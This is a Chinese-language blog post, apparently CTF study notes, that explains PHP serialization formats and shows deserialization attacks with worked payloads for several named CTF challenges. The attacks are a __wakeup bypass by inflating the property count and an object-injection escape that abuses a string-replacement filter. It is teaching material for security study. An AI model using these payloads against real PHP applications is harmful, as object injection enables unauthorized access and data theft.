PHP序列化及反序列化绕过

最新推荐文章于 2024-04-19 17:45:00 发布
最新推荐文章于 2024-04-19 17:45:00 发布
阅读量3k 收藏 12
点赞数 4
分类专栏: ctf 笔记 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46041723/article/details/109751969
版权

序列化和反序列化及绕过

前言

本菜鸡本着菜死人不偿命的觉悟,接着迈向了ctf的世界。
废话不多说,今天来谈一下PHP的序列化和反序列化还有一些绕过姿势

序列化和反序列化

序列化

在PHP里面存在一个serialize方法来实现序列化功能。

Serializable {
/* 方法 */
abstract public serialize ( ) : string
abstract public unserialize ( string $serialized ) : mixed
}

在官方说明中提供了这个接口的摘要。
接下来用本地实验的例子来说明一下序列化结果的大致格式

<?php
$init=12;
echo serialize($init).'<br />';//序列化整形数据,得到格式为i:12;
$string='test';
echo serialize($string).'<br />';//序列化字符串型数据,得到格式为s:4:"test";
$boolean=false;
echo serialize($boolean).'<br />';//序列化布尔类型数据,得到格式为b:0;
$array = array('0' =>'array');
echo serialize($array).'<br />';//序列化数组类型数据,得到格式为a:1:{i:0;s:5:"array";}
?>

运行结果
所以,经过试验可以得出:
iinteger代表的是整型的数据,其数据的范围-2147483648~2147483647,而其后面跟的12就是这个变量的值;
sstring代表的是字符串类型的数据,后面跟的4为变量的字符个数,之后跟的是变量的值;
bbool代表的是布尔类型的数据,而布尔类型的数据只有falsetrue两种,返回时只会返回01
aarray代表的是数组类型的数据,可以看到有一个花括号,前面半部分是索引值,代表的是数组索引是从0开始,后面是当前索引位置的数据的类型和值。
关于其他的,就不在这里进行总结,总结几个比较常见的。
当然还有就是PHP语言特性,可以把整个方法或者整个类给序列化,这时的格式就是O开头了。

<?php
/*$init=12;
echo serialize($init).'<br />';
$string='test';
echo serialize($string).'<br />';
$boolean=false;
echo serialize($boolean).'<br />';
$array = array('0' =>'array');
echo serialize($array).'<br />';*/
/**
 * 
 */
class test
{
	public $username;
	public $password;
	public function __construct($username,$password)
	{
		# code...
		$this->username=$username;
		$this->password=$password;
	}
	public function __wakeup()
	{
		if ($this->username==='zhangsan'&&this->$password==='123456') {
			# code...
			echo "flag{nice!}";
		}
		else
		{
			echo "stop hacker!";
		}
	}
}
$username='zhangsan';
$password='123456';
$a=new test($username,$password);
echo serialize($a);
?>

得到结果
序列化类结果

反序列化

既然有了序列化函数serialize,那反序列化函数就能猜出来是unserialize
在这里需要注意的是若被反序列化的变量是一个对象,在成功重新构造对象之后,PHP会自动地试图去调用__wakeup()成员函数(如果存在的话)
也就是说比如在上面的例子中,若加入

$b=serialize($a);
$test=unserialize($b);

那么就会得到
得到结果
即在检测到这个反序列化对象是个类之后,发现有__wakeup()函数,会执行这个函数。而在源码中是执行了让一个if判断,满足输出指定内容。在这里也可以进行一个修改序列化的值,从而达到相关的目的。

反序列化绕过

序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行,并且不会报错,可以被正常反序列化

也就是说,在实际题目中,可以通过修改指定的值使其大于原值,从而达到绕过的目的。
也就是说假如现在有一串这个代码。

<?php
class test
{
	public $a='flag{nice!}';
	public function __wakeup()
	{
		echo $this->a='go out,hacker!';
	}
	public function __destruct()
	{
		echo $this->a;
	}
}
$a='O:4:"test":1:{s:1:"a";s:11:"flag{nice!}";}';
$b=unserialize($a);
?>

大致的题目意思就是有一个类,里面的变量a为flag字符串,然后需要输出,但是在上面说的会调用wakeup函数,导致无法输出flag字符串。即
正常输出
但是现在需要输出它,所以就可以用上面说的方法来绕过wakeup函数,即构造payload为a=O:4:"test":2:{s:1:"a";s:11:"flag{nice!}";}
此时输出为
要求输出
从而达到了绕过的想法。

序列化利用

反序列化可以绕过,同样序列化也可以进行利用。
假如现在的代码为

<?php
class a
{
	public $username;
	public $password;
	public function __construct($username,$password)
	{
		$this->username=$username;
		$this->password=$password;
	}
	public function __wakeup()
	{
			if($this->username==='zhangsan')
			{
				include('flag.php');
				echo $flag;	
			}
			else
			{
				echo 'wrong password';
			}
		}
	}

function filter($string){
    return str_replace('hahaha','heyheyhey',$string);
}
$username='lisi';
$password=$_GET[1];
$ser=filter(serialize(new a($username,$password)));
$test=unserialize($ser);
?>

通过源码知需要绕过wakeup函数里的if判断,然后执行语句,但是username变量值被写死,因此这时候就可以利用序列化进行操作。
首先对类进行序列化查看一下
序列化结果

发现本应该是hahaha的变成了heyheyhey
然后构造一下payload的一部分:";s:8:"username";s:8:"zhangsan";}共30个字符,然后字符替换是有3个字符,所以应该构造最终payload为:hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha";s:8:"username";s:8:"zhangsan";}
运行结果
结果
发现username值被成功改为zhangsan。说明成功。
所以效果最终为:
最终结果

注意:如果在本地实验中发现修改之后页面提示错误的,可以在源码里加一个函数

function mb_unserialize($serial_str) {
$out = preg_replace('!s:(\d+):"(.*?)";!se', "'s:'.strlen('$2').':\"$2\";'", $serial_str );
return unserialize($out);
}

是在报 unserialize(): Error at offset 124 of 181 bytes in错误时可以尝试这个自建函数来进行实验。

ctf题目实例

攻防世界 unserialize3

打开题目,发现源码

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

所以,根据上面讲的,可以直接将flag字符串那一列进行序列化,然后修改值得到flag。
先序列化得到O:4:"xctf":1:{s:4:"flag";s:3:"111";},修改得O:4:"xctf":2:{s:4:"flag";s:3:"111";}
flag

攻防世界 Web_php_unserialize

打开题目
源码
同样,修改一下,进行序列化,然后O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";},然后修改得到O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";},这里注意还需要一次base64编码才能得到。

ctfshow 月饼杯第一题次夜圆

具体源码和上面那个序列化利用是一样的,也可以说上面的序列化利用中举的例子就是这个题目,按照上面得方法,构造最终payload为:?1=FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";},提交得到flag。
得到flag

尾言

还是经常说的那句话,自己总结的只是一些入门的东西,更加深刻得方面需要慢慢学习下去,努力下去,一切都有可能,加油。

墨子轩、
关注
  • 4
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
PHP序列化反序列化入门
qq_35897989的博客
03-30 163
有关php序列化的一下知识
浅谈PHP序列化反序列化
weixin_43553654的博客
12-24 384
1.序列化是什么意思呢?序列化就是把本来不能直接存储的数据转换成可存储的数据,并且不会丢掉数据格式 serialize();2.反序列化是什么意思呢?其实就是字面的意思,把序列化的数据,转换成我们需要的格式 unserialize();那么什么是序列化呢,序列化说通俗点就是把一个对象变成可以传输的字符串。举个例子,不知道大家知不知道json格式,这就是一种序列化,有可能就是通过ar...
PHP序列化反序列化
qq_31088019的博客
08-25 4121
PHP序列化反序列化及案例
反序列化】广东省第三界强网杯_API
serendipity1130的博客
08-28 726
考点:反序列化、json格式 1.根据提示访问api,发现要进行上传filename 2.当post的filename=index.php会提示:sorry,json_decode error! 3.所以post一个json格式的data:filename={"file":"../index.php"},filename={"file":"../hack.php"}可以读到两个php的源代码: 4.代码审计:x参数调用了一个新的hack类,最后会输出x会执行读取文件的函数,读取文件的函数在hac
PHP反序列化【原理+CTF实战】
2301_80127209的博客
04-19 819
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。序列化的目的是方便数据的传输和存储,在PHP中,序列化反序列化一般用做缓存,比如session缓存,cookie等.进行绕过,(在赛后我把题给Ssh1y写了,他的利用方式是nc反弹个shell,属实是开拓了我的眼界)。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。”,这显然就无法继续利用了。编码后在前部加7个1。
php(phar)反序列化漏洞及各种绕过姿势
MrWangisgoodboy的博客
04-14 4843
概念:序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。简单来说就是我在一个地方构造了一个类,但我要在另一个地方去使用它,那怎么传过去呢?于是就想到了序列化这种东西,将对象先序列化为一个字符串(数据),后续需要使用的时候再进行反序列化即可得到要使用的对象,十分方便。来看看怎么说:所有php里面的值都可以使用函数来返回一个包含字节流的字符串来表示。函数能够重新把字符串变回php原来的值。序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。
CTF必看~ PHP反序列化漏洞6:绝妙_wakeup绕过技巧
Eason_LYC安全白帽子的成长博客
05-22 3563
_wakeup()是 PHP 中一个特殊的魔术方法。它在反序列化一个对象时被自动调用,允许开发者在对象从序列化格式还原为可用的 PHP 对象之前对其进行某些特殊处理。这个方法可以接受任意的参数,但在实际使用中,它通常不需要参数。
在线php序列化工具,序列化器 | Elasticsearch-PHP | Elastic
weixin_30452659的博客
03-12 6521
实现自定义序列化器edit如果你想使用自定义序列器,你需要实现 SerializerInterface 接口。请记住,对于所有的 endpoint 和连接来说,客户端只使用一个序列器对象。class MyCustomSerializer implements SerializerInterface{/*** Serialize request body** @param string|array ...
ThinkPHP v6.0.7 eval反序列化利用链1
08-03
在本文中,我们将探讨ThinkPHP v6.0.7版本中的一个安全问题,即通过eval反序列化利用链。这个漏洞允许攻击者执行任意代码,对系统造成潜在的危害。我们将深入分析利用条件、环境配置、链条分析以及如何构建利用链。 ...
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
PHP中,对象序列化是将对象转换为可存储或传输的字符串的过程,而反序列化则是将这个字符串恢复为原始对象的过程。这种漏洞允许攻击者通过控制输入数据来改变反序列化过程,从而可能导致代码执行、权限提升或其他...
Laravel8反序列化POP链分析挖掘 .pdf
09-05
这意味着,通过构造适当的序列化数据,我们可以创建一个可调用对象,绕过单参数的限制,从而执行带有多个参数的函数。 总的来说,Laravel 8的反序列化漏洞挖掘涉及到对框架内部组件的深入理解,包括类的生命周期、...
KiteCMS的漏洞挖掘之旅(任意文件写入、任意文件读取和反序列化)1
08-03
在本文中,我们将深入探讨KiteCMS的安全漏洞,特别是关于任意文件写入、任意文件读取和反序列化的风险。KiteCMS是一个基于ThinkPHP5.1框架构建的内容管理系统(CMS)。由于其代码中存在的一些设计缺陷,攻击者可能...
preg-match绕过
最新发布
05-19
为了避免绕过 preg_match 函数的功能限制,通常可以采取以下措施: 过滤用户输入:在将用户输入作为正则表达式模式使用之前,应该对其进行过滤和验证,确保用户输入符合预期,避免恶意输入绕过验证。 限制可接受的...
PHP反序列化
weixin_59762059的博客
06-21 2267
PHP反序列化
渗透学习之PHP--序列化
qq_62886656的博客
10-03 2593
渗透学习之PHP--序列化
php 反序列化总结
m0_64815693的博客
12-02 3651
php 反序列化从零开始到啥也不会 横批:一篇足以
Day61:WEB攻防-PHP反序列化&原生类TIPS&CVE绕过漏洞&属性类型特征
qq_61553520的博客
03-19 982
小迪安全-Day61:WEB攻防-PHP反序列化&原生类TIPS&CVE绕过漏洞&属性类型特征
CTF-PHP反序列化漏洞5-反序列化字符逃逸
Eason_LYC安全白帽子的成长博客
05-15 1733
PHP反序列化漏洞是指攻击者通过构造恶意序列化数据,使得PHP反序列化函数在反序列化时执行了恶意代码,从而导致安全漏洞。其中,反序列化字符逃逸是指攻击者在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。具体来说,PHP反序列化函数在反序列化时,会对序列化字符串中的特殊字符进行转义,例如将双引号转义为\”、将反斜杠转义为\等。攻击者可以利用这个特性,在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。?
在线php序列化解析,PHP序列化serialize
weixin_30583711的博客
03-12 2021
## PHP序列化serialize****序列化对象 - 在会话中存放对象所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。为了能够unserialize()一个对象,这个对象的类必须已经定义过。如果序列化类A...
__construct php 绕过
07-27
PHP 中,`__construct` 是一个特殊的魔术方法,用于在创建类的新实例时进行初始化操作。如果你想绕过 `__construct` 方法,可以尝试以下方法之一: 1. 使用反射类:使用反射类可以绕过构造函数并创建类的实例。下面是一个示例代码: ```php class MyClass { private $property; public function __construct($value) { $this->property = $value; } public function getProperty() { return $this->property; } } $reflection = new ReflectionClass('MyClass'); $instance = $reflection->newInstanceWithoutConstructor(); // 绕过构造函数创建实例 $instance->property = 'new value'; // 设置属性值 echo $instance->getProperty(); // 输出属性值 ``` 2. 使用 `unserialize` 函数:如果你有一个序列化的类实例,并且想绕过构造函数来还原对象,可以使用 `unserialize` 函数。下面是一个示例代码: ```php class MyClass { private $property; public function __construct($value) { $this->property = $value; } public function getProperty() { return $this->property; } } $serializedObject = 'O:7:"MyClass":1:{s:8:"property";s:9:"old value";}'; // 序列化的对象 $instance = unserialize($serializedObject, ['allowed_classes' => true]); // 绕过构造函数还原对象 $instance->property = 'new value'; // 设置属性值 echo $instance->getProperty(); // 输出属性值 ``` 请注意,绕过构造函数可能会导致对象状态不一致或出现未定义的行为。在绕过构造函数时,要确保你了解所创建的对象的要求和预期行为,并相应地进行设置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值